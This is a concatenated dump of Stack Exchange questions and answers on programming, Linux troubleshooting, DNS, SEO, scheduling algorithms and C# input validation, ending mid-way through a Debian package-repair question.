_softwareengineering.164886 | I have been programming for a couple of years and have often found myself at a dilemma. There are two solutions - one is simple one i.e. simple approach, easier to understand and maintain. It involves some redundancy, some extra work (extra IO, extra processing) and therefore is not the most optimal solution. but other uses a complex approach,difficult to implement, often involving interaction between lot of modules and is a performance efficient solution.Which solution should I strive for when I do not have hard performance SLA to meet and even the simple solution can meet the performance SLA? I have felt disdain among my fellow developers for simple solution. Is it good practice to come up with most optimal complex solution if your performance SLA can be met by a simple solution? | Simple vs Complex (but performance efficient) solution - which one to choose and when? | design;programming practices;coding style;code quality;performance | Which solution should I strive for when I do not have hard performance SLA to meet and even the simple solution can meet the performance SLA? The simple one. It meets spec, it's easier to understand, it's easier to maintain, and it's probably a whole lot less buggy.What you are doing in advocating the performance efficient solution is introducing speculative generality and premature optimization into your code. Don't do it! Performance goes against the grain of just about every other software engineering 'ility' there is (reliability, maintainability, readability, testability, understandability, ...). Chase performance when testing indicates that there truly is a need to chase after performance.Do not chase performance when performance doesn't matter. Even if it does matter, you should only chase performance in those areas where the testing indicates that a performance bottleneck exists. Do not let performance problems be an excuse to replace simple_but_slow_method_to_do_X() with a faster version if that simple version doesn't show up as a bottleneck.Enhanced performance is almost inevitably encumbered with a host of code smell problems. You've mentioned several in the question: A complex approach, difficult to implement, higher coupling. Are those really worth dragging in? |
_codereview.16451 | A question was asked over at math.SE (here) about whether or not there are infinitely many superpalindromes. I'm going to rephrase the definition to a more suitable one for coding purposes:Definition: A superpalindrome is a product of primes p(1) * p(2) * ... * p(k), where p(i)<=p(i+1) for 1<=i<=k-1, such that p(1) * p(2) * ... * p(r) is a palindrome for all 1 <= r <= k.A natural question to ask, is whether or not there's an infinite number of superpalindromes with all of its prime factors <=N. Thus, we can use a depth-first search.Here is my implementation in C using GMP, but I'm wondering if there is some ways to give non-trivial run-time improvements.#include <stdio.h>#include <gmp.h>// search for superpalindromes containing prime factors in {2,3,...,q}// where q is the MAX_NR_PRIMES-th prime#define MAX_NR_PRIMES 20000#define MAX_SEARCH_DEPTH 100#define MAX_NR_DIGITS 10000// start backtracking at the (STARTING_PRIME_ID+1)-th prime#define STARTING_PRIME_ID 0mpz_t list_of_small_primes[MAX_NR_PRIMES];mpz_t n_new[MAX_SEARCH_DEPTH];int max_depth_reached=0;mpz_t nr_superpalindromes_found[MAX_SEARCH_DEPTH];// checks if n is a palindrome// idea borrowed from http://gmplib.org/list-archives/gmp-discuss/2012-February/004876.htmlint is_palindrome(mpz_t n) { char m[MAX_NR_DIGITS]; int len=gmp_sprintf(m,%Zd,n); for(int i=0;i<len;i++) { if(m[i]!=m[len-i-1]) return 0; } return 1;}// depth-first search for superpalindromes// searches for a prime p:=list_of_small_primes[i_new], with i_new>=i// such that n*p is a palindrome; continues searching if one is foundint extend_superpalindrome_backtracking_algorithm(mpz_t n,int i,int depth) { for(int i_new=i;i_new<MAX_NR_PRIMES;i_new++) { // n_new[depth]:=n*p mpz_mul(n_new[depth],n,list_of_small_primes[i_new]); if(is_palindrome(n_new[depth])) { // increment count of number of superpalindromes with depth+1 prime factors mpz_add_ui(nr_superpalindromes_found[depth],nr_superpalindromes_found[depth],1); // print out the first superpalindrome found with >depth+1 prime factors if(depth>max_depth_reached) { max_depth_reached=depth; gmp_printf(superpalindrome found: %Zd at depth %d: ,n_new[depth],depth+1); mpz_t primes[MAX_SEARCH_DEPTH]; for(int i=0;i<MAX_SEARCH_DEPTH;i++) mpz_init(primes[i]); mpz_set(primes[0],n_new[0]); for(int i=1;i<=depth;i++) mpz_divexact(primes[i],n_new[i],n_new[i-1]); for(int i=0;i<=depth;i++) gmp_printf(%Zd ,primes[i]); printf(\n); for(int i=0;i<MAX_SEARCH_DEPTH;i++) mpz_clear(primes[i]); } // continue the depth-first search if superpalindrome found extend_superpalindrome_backtracking_algorithm(n_new[depth],i_new,depth+1); } }}int main() { mpz_t n,p; mpz_init_set_ui(n,1); mpz_init_set(p,list_of_small_primes[STARTING_PRIME_ID]); for(int i=0;i<MAX_SEARCH_DEPTH;i++) mpz_init(n_new[i]); for(int i=0;i<MAX_SEARCH_DEPTH;i++) mpz_init(nr_superpalindromes_found[i]); for(int i=0;i<MAX_NR_PRIMES;i++) mpz_init(list_of_small_primes[i]); // pre-compute small primes mpz_set_ui(list_of_small_primes[0],2); for(int i=1;i<MAX_NR_PRIMES;i++) mpz_nextprime(list_of_small_primes[i],list_of_small_primes[i-1]); extend_superpalindrome_backtracking_algorithm(n,STARTING_PRIME_ID,0); // output results gmp_printf(\nfound all superpalindromes with prime factors in {2,3,...,%Zd}\n,list_of_small_primes[MAX_NR_PRIMES-1]); mpz_t total_nr_superpalindromes; mpz_init_set_ui(total_nr_superpalindromes,0); for(int i=0;i<=max_depth_reached;i++) { mpz_add(total_nr_superpalindromes,total_nr_superpalindromes,nr_superpalindromes_found[i]); gmp_printf(nr superpalindromes with %d prime factors: %Zd\n,i+1,nr_superpalindromes_found[i]); } gmp_printf(total nr superpalindromes: %Zd\n,total_nr_superpalindromes); mpz_clear(total_nr_superpalindromes); for(int i=0;i<MAX_SEARCH_DEPTH;i++) mpz_clear(n_new[i]); for(int i=0;i<MAX_NR_PRIMES;i++) mpz_clear(list_of_small_primes[i]); mpz_clear(n); mpz_clear(p); return 0;}Here's the output:superpalindrome found: 4 at depth 2: 2 2 superpalindrome found: 8 at depth 3: 2 2 2 superpalindrome found: 88 at depth 4: 2 2 2 11 superpalindrome found: 2552 at depth 5: 2 2 2 11 29 superpalindrome found: 257752 at depth 6: 2 2 2 11 29 101 superpalindrome found: 67788776 at depth 7: 2 2 2 11 29 101 263 superpalindrome found: 616267762616 at depth 8: 2 2 2 11 29 101 263 9091 superpalindrome found: 6101667117661016 at depth 9: 2 2 2 11 29 101 263 9091 9901 superpalindrome found: 20302629368699686392620302 at depth 10: 2 11 11 11 101 9091 9091 9091 9901 10151 superpalindrome found: 1001004004006006004004001001 at depth 11: 7 11 13 101 101 101 101 9901 9901 9901 9901 found all superpalindromes with prime factors in {2,3,...,224737}nr superpalindromes with 1 prime factors: 113nr superpalindromes with 2 prime factors: 428nr superpalindromes with 3 prime factors: 1022nr superpalindromes with 4 prime factors: 1539nr superpalindromes with 5 prime factors: 1603nr superpalindromes with 6 prime factors: 1137nr superpalindromes with 7 prime factors: 565nr superpalindromes with 8 prime factors: 217nr superpalindromes with 9 prime factors: 50nr superpalindromes with 10 prime factors: 13nr superpalindromes with 11 prime factors: 1total nr superpalindromes: 6688Currently, I'm mostly concerned about the efficiency of is_palindrome(mpz_t n) since it feels like a two-pass method: (a) copy the number to a string, (b) check if the string is a palindrome. But please highlight any other areas I might not be concerned about but should be.Most of the numbers encountered by is_palindrome(mpz_t n) will not be palindromes, but my attempt at checking only the first and last digits was thwarted by mpz_sizeinbase not giving the exact number of digits in base 10 (and it added too much overhead to add a check if the number of digits is correct function). | Depth-first search method for searching for all superpalindromes whose prime factors are all <=N | optimization;c;primes;palindrome;depth first search | null |
_unix.141192 | My system has problems with the displayport connection. This is indicated by several problems that, at the first glance, do not have anything in common. The reason why I claim DP for being the cause, is that when I connect another monitor via DVI these problems just vanish.When I put monitor into sleep it won't wake up. Journal contains:[drm:intel_dp_start_link_train] *ERROR* failed to enable linkand sometimes[drm:i915_hangcheck_elapsed] *ERROR* Hangcheck timer elapsed... GPU hungQt applications need a few seconds to start. And meanwhile freeze X. Today I had a complete never-ending system freeze. As a followup KDE start is painfully slow and accompanied by multiple freezes.I use an up-to-date Arch System on an i5-4590, using the Intel HD4600.Here is dmesg with drm.debug=0xe comandline. I cut about a million [drm:drm_dp_i2c_do_msg] native defer lines to make it cleaner.Intel drivers are installed. The config:# for i in /sys/module/i915/parameters/*; do echo $i=$(cat $i); done/sys/module/i915/parameters/disable_display=N/sys/module/i915/parameters/disable_power_well=1/sys/module/i915/parameters/enable_cmd_parser=0/sys/module/i915/parameters/enable_fbc=-1/sys/module/i915/parameters/enable_hangcheck=Y/sys/module/i915/parameters/enable_ips=1/sys/module/i915/parameters/enable_ppgtt=1/sys/module/i915/parameters/enable_psr=0/sys/module/i915/parameters/enable_rc6=-1/sys/module/i915/parameters/fastboot=N/sys/module/i915/parameters/invert_brightness=0/sys/module/i915/parameters/lvds_channel_mode=0/sys/module/i915/parameters/lvds_downclock=0/sys/module/i915/parameters/lvds_use_ssc=-1/sys/module/i915/parameters/modeset=-1/sys/module/i915/parameters/panel_ignore_lid=1/sys/module/i915/parameters/powersave=1/sys/module/i915/parameters/prefault_disable=N/sys/module/i915/parameters/preliminary_hw_support=0/sys/module/i915/parameters/reset=Y/sys/module/i915/parameters/semaphores=-1/sys/module/i915/parameters/vbt_sdvo_panel_type=-1 | DisplayPort and Intel HD cause GPU hangs | linux kernel;i915;displayport;drm | null |
_softwareengineering.110371 | I have built a number of websites for friends, family, etc. and I have put them all on a single shared web hosting account. Now that they are built, I want to get out of business of supporting them and paying for them (my friends are reimbursing me but I am paying for the actual bill) so I was thinking of having them create their own hosting accounts and slowly migrating the sites over.It got me thinking how does any freelancer do this? Do they force their clients to setup their own hosting up front and let the programmer log into the customer account during development. What if there is a bug in the future and they need to go back in?I was curious to see what model most people use who build websites for others as it seems like a tricky situation. | How do freelancer web developers manage web hosting for customers? | freelancing;web hosting | null |
_cs.41082 | In this problem. I have a set of activities which can happen. Each activity is associated with several values:Duration: The length of time the activity takesEarliest time to start: The earilest time at which the activity can beginLatest time to start: The latest time at which the activity can beginWeight/Value: The value/benefit gained if the activity happens.I have a set of activities $A = \left\{ a_{1},a_{2},\dots,a_{n}\right\} $.I want to find a subset of activities $\alpha \subset A$ which maximises the total value, subject to the constraint that two activities cannot overlap in time (so the subset of activities should be such that we can schedule these activities without any overlap, and such that each activity starts within its earliest and latest start times). Activities must be performed contiguously. i.e we can't just break apart an activity in two and do half of it now and half of it later.If activities all had a fixed starting time, this would be equivalent to the Maximum Weight Independent Set of Intervals problem, but in this case an activitiy does not have a fixed starting time and it can move around.If activities could be positioned anywhere, this would be equivalent to a knapsack problem.I will use this with a time span of one day and activities will usually last between 1 and 4 hours. I had one idea which I write below but thought maybe someone would have a better idea. Heuristics and approximations would be helpful as well. I need something that will run in less than a second with ~$1000$ activities.So far what I thought of doing is duplicating activities that can move around. So if I have an activity $a$ which can start between 14:00 and 16:00, then to create three activities: at 14:00, at 15:00 and at 16:00. That way I don't need to worry anymore about activities moving around and I have a Maximum Weight Independent Set of Intervals problem which seems researched at least. Also Maximum Weight Independent Set problems are quite researched.Thank you! | Activity scheduling with activities that can move around | optimization;combinatorics;scheduling | null |
_webapps.82441 | I got an email from my colleague about our business itinerary containing flight confirmation as a PDF attachment. Turns out Google can detect that it's a flight confirmation.When I search 'itinerary' in Google it shows something like this.My question is, is there a way to add this info to my Google Calendar? (I want the flight schedule to be shown in my Sunrise app in my iPhone) | How to easily add flight itinerary to Google Calendar from flight confirmation email in Gmail? | gmail;google calendar | To add any email event to your Google Calendar...Open the email, Click on More in the menu bar, then Create event.Sometimes Gmail copies all the details you need into the event description.Depending upon how well Gmail reads the PDF file, you may have to copy / paste the details from the PDf to the Calendar event. |
_unix.191467 | How to Show your main shell that you use.? in UNIXis this command rightps -p$$ or if there is a different way? | How to Show your main shell that you use.? in UNIX | shell;shell script | null |
_webmaster.69646 | Question #1:One DNS Look-up service I use states: (BTW, moodle.org is not my website!)Your website www.moodle.org does not have CName Record which is good.Why is this good?Introduction to Question #2:The same Look-up service states the following for our Domain Name: Your website has a CName Record. Your DNS Servers do not return any A Records (IPv4 Addresses), which causes an extra DNS Lookup, which will slightly delay connections to your website.Note: You may well be thinking why are my comparing Moodle with our Domain Name? It's because both Moodle and OUR website uses CloudFlare. Granted, this isn't a fair comparison to make. So, I checked Netblock owner of my IP Address in Netcraft's Toolbar, and found a number of websites Hosted on the same Shared Hosting space. Alas, none seem to be using CloudFlare. Nevertheless, I did a DNS Loop-up of one of these, and got the following Response for CNAME:Your website has a CName Record. Your DNS Servers also return an A Record (IPv4 Address) for the CName Record, which is good as it does not require an extra DNS Lookup.Question #2:Given that the DNS Report for our Domain Name states the following, repeated from above: Your website has a CName Record. Your DNS Servers do not return any A Records (IPv4 Addresses), which causes an extra DNS Lookup, which will slightly delay connections to your website.... what change might I need to make to our DNS Record? Please note '1400 TTL'.OUR current DNS Record:mydomain.org.uk. 14400 IN A 1##.##.###.### localhost.mydomain.org.uk. 14400 IN A 127.0.0.1mail.mydomain.org.uk. 14400 IN CNAME mydomain.org.ukwww.mydomain.org.uk. 1400 IN CNAME www.mydomain.org.uk.cdn.cloudflare.netftp.mydomain.org.uk. 14400 IN A 1##.##.###.### cpanel.mydomain.org.uk. 14400 IN A 1##.##.###.### webdisk.mydomain.org.uk. 14400 IN A 1##.##.###.### whm.mydomain.org.uk. 14400 IN A 1##.##.###.###webmail.mydomain.org.uk. 14400 IN A 1##.##.###.### mydomain.org.uk. 14400 IN TXT v=spf1 +a +mx +ip4:1##.##.###.### ~all cloudflare-resolve-to.mydomain.org.uk. 1400 IN CNAME mydomain.org.uk | Good, or Bad? 'www A Record (IPv4)' - website has a CName Record. | dns;cname | A CNAME is basically an alias to another DNS record. A not uncommon setup is something like this:example.com A xxx.xxx.xxx.xxxwww.example.com CNAME example.comIf someone hits www.example.com and the DNS result isn't cached, resolution of a setup like this is very slightly slower, since two DNS lookups are required (one for www.example.com, , followed by a lookup for example.com). So that's probably why the tool you're using is referring to a lack of CNAME as 'good'.I'm not familiar with Cloudflare's product offerings, but in your case you may only be able to use a CNAME, so I really wouldn't worry about this. Moodle may have a different Cloudflare setup to you gives them a dedicated IP they can point their records to. |
_cstheory.38119 | First, I'm mostly experienced with Math, which I hope won't be too inconvenient.I saw Operational Calculus on Programming Spaces by Sajovic and Vuk, which seemed very interesting to me (for a short summary of the paper, the Wikipedia article on Automatic Differentiation may be helpful). I had a few questions about how they defined their memory space of the program. The relevant section is below:We will model computer programs as maps on a vector space. If we only focus on the real valued variables (of type float or double), the state of the virtual memory can be seen as a high dimensional vector. A set of all the possible states of the programs memory, can be modeled by a finite dimensional real vector space $\mathcal{V} \equiv \mathbb{R}^n$. We will call $\mathcal{V}$ the memory space of the program. The effect of a computer program on its memory space $\mathcal{V}$, can be described by a map $$P : \mathcal{V} \to \mathcal{V}$$ A programming space is a space of maps $\mathcal{V} \to \mathcal{V}$ that can be implemented as a program in specific programming language.I understand how $\mathcal{V}$ should be some finite object - I don't understand why this should specifically be a vector space.One analogy that may be useful for this is the following. $C(\mathbb{R})$ denotes the set of all continuous functions $f:\mathbb{R}\to\mathbb{R}$. While continuous functions themselves aren't linear, we can define addition of continuous functions and scalar multiplication of continuous functions in a linear way by defining:$$(f+g)(x) \stackrel{def}{=} f(x) + g(x)$$$$k\cdot f(x) \stackrel{def}{=} (kf(x))$$Something similar to this undoubtedly works for programs on $\mathcal{V}$ - for a given state $s$, define $p_1 + p_2$ evaluated on $s$ as $p_1(s) + p_2(s)$. While this (likely) leaves us with a Banach space, I'm unsure if it's the correct interpretation.This would give us that the sum of two programs $p_1,p_2$ applied to some state $s$ is just $p_1(s) + p_2(s)$.So, looking at a single component of $p_1(s) + p_2(s)$, we have that the action of $p_1 + p_2$, as a program, is just the sum of the individual actions of $p_1$ and $p_2$ on the initial state. This seems like an odd interpretation for me - for whatever reason it'd seem much more natural to have the way to combine programs to be function composition, but this would lead to problems like $+$ not being commutative, and scalar multiplication being harder to define.In this paper, what's the correct interpretation of addition here? The usual addition seems to lead to the correct mathematical construct, but I'm having a hard time understanding what the program sum is supposed to model in real life.Edit: This Reddit Post seems to have some commentary on it which may help others. | Justifying the state of virtual memory as a vector space | fl.formal languages;ne.neural evol | null |
_webmaster.77740 | What's more important for my website, from a SEO perspective?I first had a page load time from around 900ms and a google rating from about 70.Using some plugins I managed to get the rating up to around 85, (GTMetrix page speed 90%, YSlow 90%) but the page load time also increased to around 2 seconds.I understood that to get higher in googles ranking, you need to have a high rating. So from a SEO perspective, wanting to get high in the search results, should I revert it and go back to the 900ms/70 pagespeed rating or should I keep it like this for the higher pagespeed rating? | Pagespeed rating vs server speed from a SEO perspective | seo;wordpress;pagerank;page speed | Page speed is a bit of a misnomer. People took the early days of Google using page speed as a factor and seemed to forget what happened immediately after its implementation. I will explain.When Google announced that page speed would be a factor, a reordering of the SERP results caused a lot of heart-burn. What happened was that Google was ranking vary fast sites far more than sites that were still fast. The SERPs became far too heavy with very fast sites even when these would boost less desirable sites within results. Almost immediately the complaints were loud and strong.Google re-examined it's metrics and did an mea culpa within weeks. As it turned out, acceptable speed sites were being shutout from the top 10 results. Foul! and Not fair! was the cry from many site owners and they were right. If your site is within a normal response range or greater, there is no boost. However, if your site is below a normal rate, then there is a down-grade. Your site is measured overall, however slower pages can have an effect short of the obvious reason- content size. There is a measure that makes larger pages loading slower more acceptable that smaller pages loading slower.It is all a matter of whether your site is within an acceptable range as determined by the measures of all the sites that Google has indexed.Your site is sure fast enough. Of course you want your site to perform the best it can for user experience (UX). However, as you surf around the net, think to yourself, how fast did this site load? Most are measured in double-digit seconds these days with all the images, JavaScript, references to other sites, and so on. Google does not just measure your page, but all of what the page must download. Ever tried going to the larger e-commerce sites lately? Sshheesh!Making your site as fast as possible and as lean as possible is a good thing and you should do just that. But Mother Superior Google is not slapping your wrist with a ruler if you get a B or even a C in class. If you get an F however, WATCH OUT! |
_codereview.165201 | Verifying the user's input is almost always required, even in really simple apps such as console calculator. Due to the wide variety of scenarios where this is useful I decided to make a few classes that will make the process easier.I currently have 2 classes for validation, one for input that will require parsing and one for input that is already parsed to the specified type. They both inherit a common interface:public interface IInputValidator<T> { ValidationResult<T> Validate();}Where the ValidationResult class is implemented as follows:public class ValidationResult<T>{ public bool Success { get; } public T Value { get; } public ValidationResult(bool success, T value) { Success = success; Value = value; } public ValidationResult(bool success) : this(success, default(T)) { }}The InputValidatorUnparsed<TSource, TValue> class which deals with input that needs to be parsed before operated on:public class InputValidatorUnparsed<TSource, TValue> : IInputValidator<TValue>{ public delegate bool InputTryParse(TSource input, out TValue value); private readonly InputTryParse inputTryParse; private readonly Func<TSource> _getUnparsedValue; private Action _onFailedAction; private IEnumerable<TValue> _allowedItems = Enumerable.Empty<TValue>(); private IEqualityComparer<TValue> _comparer = EqualityComparer<TValue>.Default; public InputValidatorUnparsed(Func<TSource> getUnparsedValue, InputTryParse tryParse) { inputTryParse = tryParse ?? throw new ArgumentNullException(nameof(tryParse)); _getUnparsedValue = getUnparsedValue; } public InputValidatorUnparsed<TSource, TValue> WithFailedAction(Action onFailedAction) { _onFailedAction = onFailedAction; return this; } public InputValidatorUnparsed<TSource, TValue> WithAllowedItems(IEnumerable<TValue> allowedItems) { return WithAllowedItems(allowedItems, _comparer); } public InputValidatorUnparsed<TSource, TValue> WithAllowedItems(IEnumerable<TValue> allowedItems, IEqualityComparer<TValue> comparer) { _allowedItems = allowedItems ?? throw new ArgumentNullException(nameof(allowedItems)); _comparer = comparer ?? throw new ArgumentNullException(nameof(comparer)); return this; } public ValidationResult<TValue> Validate() { var parsingSuccess = inputTryParse.Invoke(_getUnparsedValue.Invoke(), out TValue value); if (parsingSuccess && IsAllowedItem(value)) { return new ValidationResult<TValue>(true, value); } _onFailedAction?.Invoke(); return new ValidationResult<TValue>(false, value); } private bool IsAllowedItem(TValue item) { return !_allowedItems.Any() || _allowedItems.Any(i => _comparer.Equals(i, item)); }}Example usage:var validator = new InputValidatorUnparsed<string, int>(Console.ReadLine, int.TryParse) .WithFailedAction(() => Console.WriteLine(Invalid input please try again.)) .WithAllowedItems(Enumerable.Range(1, 10));var result = validator.Validate();while (!result.Success){ result = validator.Validate();}Console.WriteLine($Correct input = {result.Value});The InputValidatorParsed<TValue> which deals with input that wont required parsing to be operated on:public class InputValidatorParsed<TValue> : IInputValidator<TValue>{ private readonly Predicate<TValue> validator; private readonly Func<TValue> getInputValue; private Action _onFailedAction; private IEnumerable<TValue> _allowedItems = Enumerable.Empty<TValue>(); private IEqualityComparer<TValue> _comparer = EqualityComparer<TValue>.Default; public InputValidatorParsed(Func<TValue> getValue, Predicate<TValue> validator) { getInputValue = getValue ?? throw new ArgumentNullException(nameof(getValue)); this.validator = validator; } public InputValidatorParsed(Func<TValue> getValue) : this(getValue, null) { } public InputValidatorParsed<TValue> WithFailedAction(Action onFailedAction) { _onFailedAction = onFailedAction; return this; } public InputValidatorParsed<TValue> WithAllowedItems(IEnumerable<TValue> allowedItems) { return WithAllowedItems(allowedItems, _comparer); } public InputValidatorParsed<TValue> WithAllowedItems(IEnumerable<TValue> allowedItems, IEqualityComparer<TValue> comparer) { _allowedItems = allowedItems ?? throw new ArgumentNullException(nameof(allowedItems)); _comparer = comparer ?? throw new ArgumentNullException(nameof(comparer)); return this; } public ValidationResult<TValue> Validate() { var value = getInputValue.Invoke(); if (validator == null) { return new ValidationResult<TValue>(IsAllowedItem(value), value); } if (validator.Invoke(value) && IsAllowedItem(value)) { return new ValidationResult<TValue>(true, value); } _onFailedAction?.Invoke(); return new ValidationResult<TValue>(false, value); } private bool IsAllowedItem(TValue item) { return !_allowedItems.Any() || _allowedItems.Any(i => _comparer.Equals(i, item)); }}Example usage:var validator = new InputValidatorParsed<string>(Console.ReadLine, t => !string.IsNullOrEmpty(t)) .WithAllowedItems(new []{value}) .WithFailedAction(() => Console.WriteLine(Invalid input please try again.));var result = validator.Validate();while (!result.Success){ result = validator.Validate();}Console.WriteLine($Correct input = {result.Value});Feel free to comment on anything, but I have few concerns in mind:I'm not happy with the naming of the classes.I do like the initialization of such object but I don't like the usage of it. Those classes will mostly be used in while loops I can imagine and the syntax for that isn't really pretty if you want to obtain the value of the result.There is repetition in the classes that maybe an abstract class can solve in some way but I don't think it's appropriate in this case as it will either look redundant or it will be way too restrictive for the derived classes. | Validating proper input | c#;object oriented;validation;generics;inheritance | I don't think there should be two validators as they are nearly identical. The only difference between them is the parsing part. They are validators so they should get a value ready for validation and not try to parse anything. It's the responsibility of a parser to know how to convert/parse one type into another one.The validators also mix the builder pattern with a normal object. Methods like WithAllowedItems should be only used by a builder and not the actual object that should either have properties for that values or be immutable and require all parameters via a constructor. I find that the semi-builder pattern makes it confusing to use because at the end I expect to call ToInputValidator or Build which are not there because I'm constructing the final object with the WithX methods. What makes it even more confusing is that some arguments are already required by the constructor which means that the WithX parameters are optional and could be simply properties which are (at least to me) more natural to initialize with an object initializer then by calling methods as if it was a builder.What I expect is either this APIvar validator = InputValidator<string> .Builder .Condition(Console.ReadLine, t => !string.IsNullOrEmpty(t)) .WithAllowedItems(new []{value}) .WithFailedAction(() => Console.WriteLine(Invalid input please try again.)) .Build(); // Throws InvalidOperationException if Condition not specified.or that onevar validator = new InputValidator<string>(Console.ReadLine, t => !string.IsNullOrEmpty(t)){ AllowedItems = new []{value}, FailedAction = () => Console.WriteLine(Invalid input please try again.)}; |
_unix.166410 | I was working on my linux machine earlier today and when I was in the middle of updating my java packages through the package manager and installing coffee script, my windows started not working and closed down. I didn't think much of it and kept on working in TexStudio and finishing my hand in for this week, saved it and closed it and closed my browser and thoughtHey, maybe it just needs a reboot! I then rebooted the computer, chose my Linux Mint partition and here is where it gets weird. The only thing I see when I boot is the Linux Mint logo and after that the screen is just completely black and all I can see is a few light grey pixels in the top left of my screen. I looks like a terminal cursor, but it's not flashing and nothing happens when I press my keyboard.The good news here is that I can boot the Linux partition in recovery mode, but I don't really know what to do from there. Is there a way to revert some of the latest changes back to how it was set up yesterday? Or am I completely lost here? I would love to have it up and running again, because it's my favorite development environment but I do not know much about the kernel and how it works.If you need more info, please tell me how to get it and I will post it here. The lspci output is seen aboveAlso I noticed the the message ideapad_laptop: Unknown Event: 1 appears on the screen about every 10 seconds. I cannot press Ctrl + Alt + F1 to enter tty from non-recovery mode | Linux Mint (LMDE) suddenly crashed and won't boot again | boot;crash;system recovery | I noticed that what happened was I install the boot sequence (or whatever it is called) on sdb1 or something similar and not on sda where the boot flag was set. So what I did was I booted linux from a live USB and re installed my linux mint, and put the boot sequence to be installed on sda and set the boot flag there through gdisk.After that I installed grub from the terminal and ran sudo update-grub and tadaa, my problems were fixed and the GRUB-loader now found the linux boot loader and the windows 7 boot loader :) |
_webapps.35906 | Is there any way to find when a specific word or phrase was added to a Wikipedia page? I want to find a way to obtain the first page that contains a match of a specific phrase (for example, the first occurrence of <ref>webapps.stackexchange.com</ref> in a page's revision history). (Manually searching through a page's revision history would be extremely tedious, so I'll need some kind of automated solution.) | Find when a phrase was added to a Wikipedia page | mediawiki;wikipedia | There is a tool called WikiBlame that lets you do exactly that: you enter a page name and a phrase to search for and will point you to the edit that added it.It's also linked from the History page of every page on the English Wikipedia (as Revision history search). |
_unix.94430 | Please see the output of below ps command:abc@smaug:~/Desktop$ ps ax | grep firefox 2213 ? Sl 2:01 /usr/lib/firefox/firefox 2644 pts/0 S+ 0:00 grep --color=auto firefoxPlease explain both rows and what process id can be used to kill firefox process?Process id 2644 keeps on changing everytime I run that command. | process id and killing process - ps commmand | process;kill;ps | when trying to find the PID of firefox, you launch a new process the filters the all the unwanted processes. this filter process (grep firefox) also contains the search-term firefox and thus finds itself.whenever you restart ps ax | grep firefox you launch a new grep-process, hence it's PID keeps changing.So, the short answer is:use PID 2213 to kill firefoxIf you want to get rid of the false positive, you can use another grep to filter it out: $ ps ax | grep firefox | grep -v grepyet another option is to use pgrep (which will only give you the PID of the found processes) $ pgrep firefox 2213 |
_unix.47359 | What is the purpose of the .xsession file in the home folder? What should be put in there? The desktop environments don't use that file and for the X startup from the tty there is .xinitrc. | What is .xsession for? | xorg;x11;login | If you log in in text mode then start a GUI session with xinit or with the wrapper script startx, then xinit does the following things:Start an X server (typically through the script /etc/X11/xinit/xserverrc).Usually run some scripts in /etc/X11 (typically /etc/X11/xinit/xinitrc), depending on how it's set up.Run ~/.xinitrc, if it exists. If it doesn't exist, run a default client (traditionally xterm).Once ~/.xinitrc terminates, kill the X server.If you log in in graphical mode on an X display manager (xdm, gdm, kdm, wdm, lightdm, ), traditionally, what is executed after you log in is some scripts in /etc/X11 then ~/.xsession.~/.xsession has the role of ~/.profile and ~/.xinitrc combined: it's supposed to perform the initial startup of your session (e.g. define environment variables), then launch programs specific to the GUI (usually at least window manager).Nowadays, most X display managers give you a choice of a session. Choosing a particular session launched a specific desktop environment, session manager, window manager. What is executed then is only that DE/SM/WM and whatever programs it chooses to start based on whatever configuration files it chooses to read. Many environments provide a custom session that reads the traditional ~/.xsession. |
_datascience.2581 | I am trying to match new product description with the existing ones. Product description looks like this: Panasonic DMC-FX07EB digital camera silver. These are steps to be performed:Tokenize description and recognize attributes: Panasonic => Brand, DMC-FX07EB => Model, etc.Get few candidates with similar featuresGet the best candidate.I am having problem with the first step (1). In order to get 'Panasonic => Brand', DMC-FX07EB => Model, silver => color, I need to have index where each token of the product description correspond to certain attribute name (Brand, model, color, etc.) in the existing database. The problem is that in my database product descriptions are presented as one atomic attribute e.g. 'description' (no separated product attributes).Basically I don't have training data, so I am trying to build index of all product attributes so I can build training data. So far I have attributes from bestbuy.com and semantics3.com APIs, but both sources lack most of attributes or contain irrelevant ones. Any suggestions for better APIs to get product attributes? Better approach to do this? P.S. For every product there is a matched product description in the Database, which is as well in a form of one atomic attribute. I have checked this question on SO, it helped me and it seems we have same approach but I am still trying to get training data. | Attributes extraction from unstructured product descriptions | machine learning;nlp;feature extraction | null |
_unix.226877 | I am not sure what I was thinking when I accidently deleted my /etc/dpkg/ folder. While I was fixing that, I tried many things and that made things worst. Now I am in a situation where I can not install or remove anything on my server. When I try to run something, it ends up on following message:E: Could not perform immediate configuration on 'multiarch-support'. Please see man 5 apt.conf under APT::Immediate-Configure for details. (2)I have tried everything I could :( Can someone please guide me here? Server is debian 6.0I can not install a fresh copy because I am using ispconfig to manage many domains and there is no way to backup that so I can install a fresh copy and restore stuff without doing a lot of work again.Server Response:Linux ispconfig.baskemus.com 2.6.32-5-amd64 #1 SMP Mon Feb 25 00:26:11 UTC 2013 x86_64The programs included with the Debian GNU/Linux system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extentpermitted by applicable law.ispconfig# apt-get dist-upgradeReading package lists... DoneBuilding dependency treeReading state information... DoneCalculating upgrade... DoneThe following NEW packages will be installed:adduser apt apt-utils base-files base-passwd bash bash-completion bsdmainutils bsdutils ca-certificates coreutils dash dbus debconf debconf-i18n debian-archive-keyring debianutils diffutils dmsetup dpkg e2fslibs e2fsprogs findutils gawk gcc-5-base gnupg gnupg-curl gpgv grep gzip hostname init init-system-helpers initscripts insserv krb5-locales libacl1 libapparmor1 libapt-inst1.7 libapt-pkg4.16 libattr1 libaudit-common libaudit1 libblkid1 libbz2-1.0 libc-bin libc6 libcap-ng0 libcap2 libcap2-bin libcomerr2 libcryptsetup4 libcurl3-gnutls libdb5.3 libdbus-1-3 libdebconfclient0 libdevmapper1.02.1 libexpat1 libfdisk1 libffi6 libgcc1 libgcrypt20 libgmp10 libgnutls-deb0-28 libgpg-error0 libgpm2 libgssapi-krb5-2 libhogweed4 libidn11 libk5crypto3 libkeyutils1 libkmod2 libkrb5-3 libkrb5support0 libldap-2.4-2 liblocale-gettext-perl liblzma5 libmount1 libmpfr4 libncurses5 libncursesw5 libnettle6 libp11-kit0 libpam-cap libpam-modules libpam-modules-bin libpam-runtime libpam-systemd libpam0g libpcre3 libprocps4 libreadline6 librtmp1 libsasl2-2 libsasl2-modules libsasl2-modules-db libseccomp2 libselinux1 libsemanage-common libsemanage1 libsepol1 libsigsegv2 libsmartcols1 libss2 libssh2-1 libssl1.0.0 libstdc++6 libsystemd0 libtasn1-6 libtext-charwidth-perl libtext-iconv-perl libtext-wrapi18n-perl libtinfo5 libudev1 libusb-0.1-4 